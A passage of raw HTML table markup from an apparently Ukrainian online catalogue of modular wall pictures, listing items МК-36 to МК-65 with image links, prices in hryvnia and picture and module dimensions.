20х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х20, 20х50, 20х35</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-63.jpg\" alt=\"мк 63\" width=\"200\" height=\"149\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-64.jpg\" alt=\"мк 64\" width=\"200\" height=\"148\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-65.jpg\" alt=\"мк 65\" width=\"204\" height=\"152\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-63</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-64</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-65</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х45&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х45&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х45, 20х35, 20х25</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х45, 20х35, 20х25</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-60.jpg\" alt=\"мк 60\" width=\"230\" height=\"140\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-61.jpg\" alt=\"мк 61\" width=\"230\" height=\"140\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-62.jpg\" alt=\"мк 62\" width=\"230\" height=\"139\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-60</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-61</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-62</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х35, 20х35, 20х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х35, 20х35, 20х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х35, 20х35, 20х35</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-57.jpg\" alt=\"мк 57\" width=\"230\" height=\"139\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-58.jpg\" alt=\"мк 58\" width=\"230\" height=\"139\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-59.jpg\" alt=\"мк 59\" width=\"230\" height=\"139\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-57</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-58</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-59</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х35, 20х35, 20х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-54.jpg\" alt=\"мк 54\" width=\"171\" height=\"150\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-55.jpg\" alt=\"мк 55\" width=\"230\" height=\"139\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-56.jpg\" alt=\"мк 56\" width=\"230\" height=\"138\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-54</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-55</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-56</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong>&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х55</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х30, 20х55, 20х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-51.jpg\" alt=\"мк 51\" width=\"190\" height=\"169\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-52.jpg\" alt=\"мк 52\" width=\"200\" height=\"177\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-53.jpg\" alt=\"мк 53\" width=\"200\" height=\"179\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-51</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-52</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-53</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х55</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х55&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х55&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х55, 20х40, 20х30&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х30, 20х40, 20х55&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х30, 20х55, 20х40&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-48.jpg\" alt=\"мк 48\" width=\"184\" height=\"164\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-49.jpg\" alt=\"мк 49\" width=\"193\" height=\"171\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-50.jpg\" alt=\"мк 50\" width=\"177\" height=\"199\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-48</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-49</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-50</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong><strong><span style=\"font-size: 12pt;\"><br /></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">215грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х55</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х55&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;55х60&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х30, 20х55, 20х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х30, 20х55, 20х40&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:30х20, 55х20, 40х20&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-45.jpg\" alt=\"мк 45\" width=\"200\" height=\"124\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-46.jpg\" alt=\"мк 46\" width=\"200\" height=\"127\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-47.jpg\" alt=\"мк 47\" width=\"123\" height=\"177\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-45</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-46</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-47</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">240грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">240грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">240грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;75х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;75х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;45х75</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х40, 25х45, 25х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х40, 25х45, 25х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;40х25, 45х25, 40х25</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-42.jpg\" alt=\"мк 42\" width=\"200\" height=\"123\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-43.jpg\" alt=\"мк 43\" width=\"205\" height=\"121\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-44.jpg\" alt=\"мк 44\" width=\"200\" height=\"141\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-42</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-43</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-44</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">240грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">240грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">240грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;75х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;75х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;75х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х40, 25х45, 25х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х40, 25х45, 25х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х40, 25х45, 25х40</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-39.jpg\" alt=\"мк 39\" width=\"200\" height=\"161\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-40.jpg\" alt=\"мк 40\" width=\"212\" height=\"120\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-41.jpg\" alt=\"мк 41\" width=\"200\" height=\"116\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-39</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-40</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-41</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">220грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">220грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">220грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;62х52</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;80х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;80х45см</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х40, 20х45, 20х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х40, 20х45, 45х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;0х20см20х45, 20х40</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-36.jpg\" alt=\"мк 36\" width=\"200\" height=\"158\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-37.jpg\" 